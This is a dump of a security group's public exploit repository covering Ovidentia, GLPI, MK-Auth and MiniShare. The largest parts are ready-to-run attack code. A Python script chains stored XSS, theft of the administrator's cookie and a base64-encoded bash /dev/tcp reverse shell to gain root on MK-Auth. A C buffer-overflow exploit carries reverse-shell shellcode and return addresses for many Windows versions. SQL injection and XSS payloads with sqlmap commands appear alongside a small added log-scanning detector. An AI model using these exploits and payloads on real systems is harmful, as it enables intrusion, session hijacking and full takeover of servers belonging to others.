├── README.md
├── cms
│   ├── GLPI
│   │   ├── GLPI-stored-XSS
│   │   │   └── README.md
│   │   └── dashboard-plugin
│   │       └── README.md
│   └── ovidentia
│       ├── exploitSQLIOvidentia.txt
│       └── exploitXSSOvidentia.txt
├── mk-auth
│   ├── Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf
│   └── xss2root.py
└── windows
    └── servers
        └── minishare
            └── minishare_141_xpl.c

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

Pentest Cheat Sheets

## Public Exploits

This repository contains public exploits written by UserX and N3k00n3.

## Exploits

* CMS
  * [XSS - Ovidentia 8.4.3](./cms/ovidentia/exploitXSSOvidentia.txt)
  * [SQLi - Ovidentia 8.4.3](./cms/ovidentia/exploitSQLIOvidentia.txt)
* Servers
  * [Minishare](./windows/server/minishare/minishare_141_xpl.c)

--------------------------------------------------------------------------------
/cms/GLPI/GLPI-stored-XSS/README.md:
--------------------------------------------------------------------------------
# Stored XSS via plugin metadata

Author: Fernando Pinheiro
GLPI version: >= 9.5.4

It was possible to insert JavaScript code into a plugin's metadata fields (author, version, license and so on).

Once the plugin is placed in the plugins folder at /glpi/plugins, this code is loaded during the GLPI plugin installation: GLPI reads the metadata from the plugin file and does not sanitize it before rendering it.

--------------------------------------------------------------------------------
/cms/GLPI/dashboard-plugin/README.md:
--------------------------------------------------------------------------------
# Information Disclosure
Plugin Name: DashBoard
Plugin Version: <=1.0.2

This is for anyone who saw the post about [GLPI log files](https://medium.com/@emmapinheiro42/glpi-pesquisa-parte-02-1cb3a2b95a92), which are usually left behind with read permissions and are a great help for user enumeration.

Today I will show an interesting way to view that same information while authenticated as a low-privileged user: a bypass for when that file has been properly protected.

GLPI allows the use of plugins, which can be found in several places, most commonly on GitHub and on the [official plugin site](https://plugins.glpi-project.org/#/).

If we search for Dashboard, we find one of the plugins most used by people who deploy GLPI. This plugin is written and maintained by [stdonato](https://github.com/stdonato/glpi-dashboard/).

The path for GLPI plugins is the plugins folder:
https://example.com/glpi/plugins/

This folder is normally used after the GLPI installation and ends up being forgotten and left unprotected; with directory listing enabled, enumerating the plugins in use becomes easy.

Once we notice that the dashboard plugin is present, it is possible to view the last 10 events. A regular user would not have direct access to the file glpi/front/event.php, but can now access those same events through the file main2.php, located at /plugins/dashboard/front/main2.php.

Besides being able to observe the events, low-privileged users also gain access to other useful information that should not be accessible to them, for example:

* who is currently connected
* who the application's technicians are, through the tickets they opened in the tech category
* the latest tickets of other clients
* how many users currently exist in the database

--------------------------------------------------------------------------------
/cms/ovidentia/exploitSQLIOvidentia.txt:
--------------------------------------------------------------------------------
#-------------------------------------------------------
# Exploit Title: Ovidentia CMS - SQL Injection (Authenticated)
# Date: 06/05/2019
# [ CVE-2019-13978 ]
# Exploit Author:
# Fernando Pinheiro (n3k00n3)
# Victor Flores (UserX)
# Vendor Homepage: https://www.ovidentia.org/
# Version: 8.4.x < 8.6.4
# Tested on: Mac, Linux - Firefox, Safari
# Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------

POC

Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
Type: GET
Vulnerable Field: id
Payload:
1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)

URL: https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1

Using Request file
sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs

Using Get
./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs

---

[CHANGELOG]

4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.
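As an added defensive example (not part of the advisory or of the Kitsun3Sec repository), the script below flags the two probe shapes listed in the PoC above in web-server access logs: on the `tg=delegat` route the `id` parameter is expected to be a plain integer, so anything else is reported and classified by technique. The log lines are constructed samples, and the log format, field names and technique labels are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory): two
# legitimate requests and the two PoC payloads, URL-encoded as a client sends them.
SAMPLE_LOG = """\
10.0.0.5 - - [06/May/2019:10:01:02 +0000] "GET /ovidentia/index.php?tg=delegat&idx=mem&id=1 HTTP/1.1" 200 5120
10.0.0.9 - - [06/May/2019:10:01:07 +0000] "GET /ovidentia/index.php?tg=delegat&idx=mem&id=1%20AND%203152%3D(SELECT%20(CASE%20WHEN%20(3152%3D3152)%20THEN%203152%20ELSE%20(SELECT%209962%20UNION%20SELECT HTTP/1.1" 200 5120
10.0.0.9 - - [06/May/2019:10:01:15 +0000] "GET /ovidentia/index.php?tg=delegat&idx=mem&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))QwTg) HTTP/1.1" 200 5120
10.0.0.5 - - [06/May/2019:10:02:00 +0000] "GET /ovidentia/index.php?tg=groups HTTP/1.1" 200 3000
"""

# Common log format: ip ident user [timestamp] "METHOD url PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Checked in order, so a time-based probe is not mislabelled as boolean-based.
TECHNIQUES = [
    ("time-based", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("boolean-based", re.compile(r"\bCASE\s+WHEN\b", re.I)),
    ("union-based", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
]


def classify_id(value):
    """Return None for a well-formed numeric id, otherwise a technique label."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in TECHNIQUES:
        if pattern.search(value):
            return label
    return "non-numeric id"


def scan_log(text):
    """Return one finding per suspicious id value on the tg=delegat route."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.endswith("/index.php"):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)
        # The route named in the advisory (CVE-2019-13978): tg=delegat, parameter id.
        if qs.get("tg") != ["delegat"] or "id" not in qs:
            continue
        for raw in qs["id"]:
            label = classify_id(raw)
            if label:
                findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                                 "technique": label, "id": raw})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['technique']}: id={f['id']!r}")
```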
--------------------------------------------------------------------------------
/cms/ovidentia/exploitXSSOvidentia.txt:
--------------------------------------------------------------------------------
#-------------------------------------------------------
# Exploit Title: Ovidentia CMS - XSS Ovidentia 8.4.3
# The vulnerability permits every kind of XSS attack: reflected, DOM-based and stored.
# Date: 06/05/2019
# [ CVE-2019-13977 ]
# Exploit Author:
# Fernando Pinheiro (n3k00n3)
# Victor Flores (UserX)
# Vendor Homepage: https://www.ovidentia.org/
# Version: 8.4.3 <= 8.6.4
# Tested on: Mac, Linux - Firefox, Safari
# Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------

POC

>========================================================
Stored XSS
>========================================================

1. POST http://TARGET/ovidentia/index.php?tg=groups
   Field:
     nom
2. POST http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
   Fields:
     Nom
     Description
3. GET http://TARGET/ovidentia/index.php?tg=delegat
   Show groups
4. POST http://TARGET/ovidentia/index.php?tg=site&idx=create
   http://TARGET/ovidentia/index.php?tg=site&item=4
   Fields:
     Nom
     address
     description
5. POST http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
   Fields:
     Libellé du champ
   Fires at:
     http://TARGET/ovidentia/index.php?tg=forums&idx=notices
     http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1
     http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
6. POST http://TARGET/ovidentia/index.php?tg=notes&idx=Create
   Fields: Notes
   Fires at:
     http://TARGET/ovidentia/index.php?tg=notes&idx=List

7. POST http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
   Fields: all
   Fires at:
     http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2


>========================================================
REFLECTED
>========================================================

1. GET http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E


---


[CHANGELOG]

4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.

--------------------------------------------------------------------------------
/mk-auth/Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kitsun3Sec/exploits/2901f6d654f3f0c4f58f43be04ef7bfdf552647c/mk-auth/Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf

--------------------------------------------------------------------------------
/mk-auth/xss2root.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#
# 0day - Authenticated Stored XSS that leads to root!
#
import requests
import sys
import getopt
import re
import os
import threading
import socket
import base64

kitsun3 = '''
@@@@@@@@@@@@@@@@&&@@@@@@@@@@@@@@@@@@@@@@@@@&&@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@&&&&&&&@@@@@@@@@@@@@@@@@@@@&&&&&&@@@@@@@@@@@@@
@@@@@@@@@@@@#&&&&&&&&@@@@@@@@@@@@@@@@@@@@&&&&&&&@@@@@@@@@@@@
@@@@@@@@@@@@&&&. .&&&&@@@@@@@@@@@@@@@@@@&&&. .&&&@@@@@@@@@@@
@@@@@@@@@@@&&&& &&&&&@@@@@@@@@@@@@@@&&&&& &&&&@@@@@@@@@@
@@@@@@@@@@@&&&.. ,%&&&&@%%%%%%%%%%%@&&&&&, ..&&&@@@@@@@@@@
@@@@@@@@@@&%%%..* *#%%%%*************%%%%%* *..%%%@@@@@@@@@@
@@@@@@@@%%%%%%.*******************************.%%%%%%@@@@@@@
@@@@@@@@%,..**************************************..%@@@@@@@
@@@@@@@@@%*.***************************************%@@@@@@@@
@@@@@@@%%.(#.*************,*******,*************.,(.%%@@@@@@
@@@@@@@%..,,.*.****((****, ,*****, ,****/#****.*..,..%@@@@@@
@@@@@@@@@%*...*****%&&*****************#&&*****...*%@@@@@@@@
@@@@@@@@%%%%%%..****(&&***************&&%****..%%%%%%@@@@@@@
@@@@@@@@@%*......******&*************&/*****......*%@@@@@@@@
@@@@@@@@@@@@@@%###..,********************,.###%@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@%%.***************.(&@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%.***********.%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@%.*********.%@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@#.&&&&&.#@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%@@@@@@@@@@@@@@@@@@@@@@@@@@@
'''

target = ''
cookies = ''
user = ''
password = ''
local_port = ''
local_ip = ''
admin_cookie = 'Kitsun3Sec'
payload = ''

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": target+"/central/executar_login.php", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Pragma": "no-cache", "Cache-Control": "no-cache"}

def show_help():
    print("\n\t*********************************")
    print("\t MK-Auth Exploit by Kitsun3Sec ")
    print("\t By: alacerda (velocista) ")
    print("\t Thanks to: fcsantos (shadow) ")
    print("\t*********************************")
    print("\nINFO:\n\nThis exploit opens up a temporary listener on port 8081 to steal the Administrator's auth cookie and, after that, starts a netcat listener on the port chosen by the attacker and waits for the moment when the administrator opens the malicious message (a bad \"chamado\"). Once the Administrator opens the message, you will receive a root shell back!\n")
    print("Usage.: " + sys.argv[0] + " \n")
    print("ARGS:")
    print("\t-t:\t Target IP address (Mk-Auth IP)")
    print("\t-l:\t Local IP address (Your IP)")
    print("\t-p:\t Local PORT for Reverse Shell")
    print("\t-U:\t Username (valid client username)")
    print("\t-P:\t Password (valid password for the client)")
    print("\t-h:\t This help")

    print("\nEXAMPLE\n")
    print("If the target server has the IP address 192.168.25.136, your IP address is 192.168.25.137 and you want to receive the reverse shell on port 9090:\n")
    print("\t" + sys.argv[0] + " -t 192.168.25.136 -U myuser -P password123 -l 192.168.25.137 -p 9090")

    print("\n")
    sys.exit(0)

def open_reverse():
    url = target+"/admin/terminal.php"
    goodEvil = base64.b64encode("sudo bash -i >& /dev/tcp/" + local_ip +"/" + local_port + " 0>&1")
    data = {"comando": "sleep 5; echo " + goodEvil + " | base64 -d | bash", "terminal": "linux"}
    target_resp = requests.post(url, headers=headers, cookies=admin_cookie, data=data)

def goingForTheKill():
    ists = threading.Thread(target=open_reverse)
    ists.start()
    os.system("nc -nlvp " + local_port)

def listen_admin_cookie():
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("",8081))
    sock.listen(1)
    connection, client_address = sock.accept()
    return connection.recv(1024)

def wait_admin():
    global admin_cookie

    while "centralmka2" not in admin_cookie:
        admin_cookie = listen_admin_cookie()

    tmp = admin_cookie
    admin_cookie = {"centralmka2": tmp.split()[1].split('=')[1].split(';')[0], "mka": tmp.split()[1].split('=')[2]}

    print("We just received a cookie... Lets try it!")
    goingForTheKill()

def abrir_chamado():
    url = target+"/central/suporte.php?page=ins_chamado"
    chamado_resp = requests.get(url, headers=headers, cookies=cookies)

    protocolo = re.findall(r'.*txt_chamado" value="(.*)"', chamado_resp.text)
    print("Chamado N.: " + protocolo[0])

    url = target+"/central/executar_central.php?acao=ins_chamado"
    data = {"assunto": "Financeiro", "msg": payload, "nome": "Kitsun3Sec", "email": "kitsun3@sec.br", "chamado": protocolo[0], "abertura": "22/03/2020 21:37:42"}
    criar_resp = requests.post(url, headers=headers, cookies=cookies, data=data)
    #print(criar_resp.text)
    if criar_resp.status_code == 200:
        print("Payload sent. Let us wait for the admin token...")
        wait_admin()

def login():
    global cookies
    url = target+"/central/login.php"
    resp = requests.get(url, headers=headers)

    #Cookies @ resp.cookies
    cookies = resp.cookies

    #CSRF-Token @ csrf_token[0]
    csrf_token = re.findall(r'.*token_central" value="(.*)"', resp.text)

    url = target+"/central/executar_login.php"
    data = {"token_central": csrf_token[0], "txt_login": user, "txt_senha": password}
    login_resp = requests.post(url, headers=headers, cookies=cookies, data=data)

    if login_resp.status_code == 200:
        print(" \\0/")
        print("We are logged in!")
        abrir_chamado()
    else:
        print("':( ")
        print("Login Failed! Are you sure your credential is valid?")

def main(argv):
    print(kitsun3)
    global target
    global user
    global password
    global local_port
    global local_ip
    global payload

    try:
        opts, args = getopt.getopt(argv,"t:l:p:hU:P:")
    except getopt.GetoptError:
        show_help()

    for opt, arg in opts:
        if opt == '-h':
            show_help()
        # target
        elif opt == '-t':
            target = "http://"+arg
        # Local IP
        elif opt == '-l':
            local_ip = arg
            payload = ""
        # Local port for reverse shell
        elif opt == '-p':
            local_port = arg
        elif opt == '-U':
            user = arg
        elif opt == '-P':
            password = arg
        else:
            show_help()

    login()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        show_help()
    main(sys.argv[1:])

--------------------------------------------------------------------------------
/windows/servers/minishare/minishare_141_xpl.c:
--------------------------------------------------------------------------------
/*
 * Exploit Title: Minishare 1.4.1 RCE exploit
 * Date: 17th of April of 2019
 * Exploit Author: Victor Vigel Flores
 * Vendor Homepage: https://sourceforge.net/projects/minishare/
 * Software Link: https://sourceforge.net/projects/minishare/
 * Version: 1.4.1
 * Tested on: Microsoft Windows 2000 ~ XP-SP3
 * CVE : 2004-2271
 */

/* Header names were stripped from the published copy; these are the standard
 * headers the code below requires. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#include <time.h>

#define SA struct sockaddr
#define SA_IN struct sockaddr_in

#define BUFF_ERR_LENGTH 1787
#define PAYLOAD_LENGTH 2500

#define GET "GET "
#define HTTP " HTTP/1.1\r\n\r\n"

void generate_random_text(char * str, size_t size);
char * mount_payload(const int target);
int createSocket (const char * target,
                  const int port);

/*
 * msfvenom -p windows/shell_reverse_tcp LHOST=X.X.X.X LPORT=1337
 * EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40"
 * -f c -v payload
 */
unsigned char pload[] =
"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xb7\xa7\xaa\x94\x83\xee\xfc\xe2\xf4\x4b\x4f\x28\x94\xb7\xa7"
"\xca\x1d\x52\x96\x6a\xf0\x3c\xf7\x9a\x1f\xe5\xab\x21\xc6\xa3"
"\x2c\xd8\xbc\xb8\x10\xe0\xb2\x86\x58\x06\xa8\xd6\xdb\xa8\xb8"
"\x97\x66\x65\x99\xb6\x60\x48\x66\xe5\xf0\x21\xc6\xa7\x2c\xe0"
"\xa8\x3c\xeb\xbb\xec\x54\xef\xab\x45\xe6\x2c\xf3\xb4\xb6\x74"
"\x21\xdd\xaf\x44\x90\xdd\x3c\x93\x21\x95\x61\x96\x55\x38\x76"
"\x68\xa7\x95\x70\x9f\x4a\xe1\x41\xa4\xd7\x6c\x8c\xda\x8e\xe1"
"\x53\xff\x21\xcc\x93\xa6\x79\xf2\x3c\xab\xe1\x1f\xef\xbb\xab"
"\x47\x3c\xa3\x21\x95\x67\x2e\xee\xb0\x93\xfc\xf1\xf5\xee\xfd"
"\xfb\x6b\x57\xf8\xf5\xce\x3c\xb5\x41\x19\xea\xcf\x99\xa6\xb7"
"\xa7\xc2\xe3\xc4\x95\xf5\xc0\xdf\xeb\xdd\xb2\xb0\x58\x7f\x2c"
"\x27\xa6\xaa\x94\x9e\x63\xfe\xc4\xdf\x8e\x2a\xff\xb7\x58\x7f"
"\xc4\xe7\xf7\xfa\xd4\xe7\xe7\xfa\xfc\x5d\xa8\x75\x74\x48\x72"
"\x3d\xfe\xb2\xcf\xa0\x9f\xb7\xfb\xc2\x96\xb7\xa2\x93\x1d\x51"
"\xcd\xba\xc2\xe0\xcf\x33\x31\xc3\xc6\x55\x41\x32\x67\xde\x98"
"\x48\xe9\xa2\xe1\x5b\xcf\x5a\x21\x15\xf1\x55\x41\xdf\xc4\xc7"
"\xf0\xb7\x2e\x49\xc3\xe0\xf0\x9b\x62\xdd\xb5\xf3\xc2\x55\x5a"
"\xcc\x53\xf3\x83\x96\x95\xb6\x2a\xee\xb0\xa7\x61\xaa\xd0\xe3"
"\xf7\xfc\xc2\xe1\xe1\xfc\xda\xe1\xf1\xf9\xc2\xdf\xde\x66\xab"
"\x31\x58\x7f\x1d\x57\xe9\xfc\xd2\x48\x97\xc2\x9c\x30\xba\xca"
"\x6b\x62\x1c\x4a\x89\x9d\xad\xc2\x32\x22\x1a\x37\x6b\x62\x9b"
"\xac\xe8\xbd\x27\x51\x74\xc2\xa2\x11\xd3\xa4\xd5\xc5\xfe\xb7"
"\xf4\x55\x41";

const char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90";


/* Return address per target, selected by index on the command line. */
const char * targets[] = {
    "\xab\xa3\x54\x77", // Windows 2000 SP0->SP3 English
    "\x64\xf1\x17\x75", // Windows 2000 SP4 English
    "\x54\x1d\xab\x71", // Windows XP SP0-SP1 English
    "\x72\x93\xab\x71", // Windows XP SP2 English
    "\x4d\x3c\xc0\x71", // Windows 2003 SP0 English
    "\x80\x36\x40\x77", // Windows 2003 SP1 English
    "\x80\x26\x40\x77", // Windows 2003 SP2 English
    "\xf8\x29\xf3\x77", // Windows NT 4.0 SP6
    "\x0a\xaf\xd5\x77", // Windows XP SP2 German
    "\x6e\xe2\xd4\x77", // Windows XP SP2 Polish
    "\x0a\xaf\xd5\x77", // Windows XP SP2 French
    "\x53\x93\x3a\x7e"  // Windows XP SP3 French
};

int
createSocket(const char * target, const int port) {
    int sockfd = socket (AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror ("unable to create socket");
        exit(EXIT_FAILURE);
    }

    SA_IN hostaddr;
    bzero(&hostaddr, sizeof(hostaddr));
    hostaddr.sin_family = AF_INET;
    hostaddr.sin_addr.s_addr = inet_addr (target);
    hostaddr.sin_port = htons (port);

    if (connect (sockfd, (SA *)&hostaddr, sizeof (hostaddr)) != 0) {
        perror ("trying to reach the target");
        exit(EXIT_FAILURE);
    }
    return sockfd;
}

/* Fills str with `size` random letters; str must hold size + 1 bytes. */
void
generate_random_text(char * str, size_t size) {
    const char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVXWYZabcdefghijklmnopqrstuvxwyz";

    srand(time(NULL));
    for (size_t i = 0; i < size; i++) {
        str[i] = alphabet[rand() % strlen(alphabet)];
    }
    str[size] = 0x00;
}

char *
mount_payload (const int target) {
    if (target < 0 || target > 11) {
        fprintf (stderr, "Invalid OS target [!!]\n");
        exit (EXIT_FAILURE);
    }

    /* One extra byte in each buffer for the terminating NUL. */
    char * payload = (char *) calloc (PAYLOAD_LENGTH + 1, sizeof (char));
    char rand_text[BUFF_ERR_LENGTH + 1];
    generate_random_text (rand_text, BUFF_ERR_LENGTH);
    sprintf(payload, "%s%s%s%s%s", GET, rand_text, targets[target], nops, pload);

    int len = strlen(payload);
    int remain = PAYLOAD_LENGTH - len - 13;

    for (int i = 0; i < remain; i++) {
        payload[(len)+i] = 'B';
    }

    strncat (payload, HTTP, PAYLOAD_LENGTH);

    return payload;
}

int
main(int argc, char ** argv) {

    if (argc < 4) {
        printf ("Usage: %s <target_ip> <port> <target_index>\n", argv[0]);
        exit (EXIT_SUCCESS);
    }
    char * payload = mount_payload (atoi(argv[3]));
    int sockfd = createSocket (argv[1], atoi(argv[2]));

    write (sockfd, payload, strlen(payload));

    free (payload);
    close(sockfd);

    return 0;
}
--------------------------------------------------------------------------------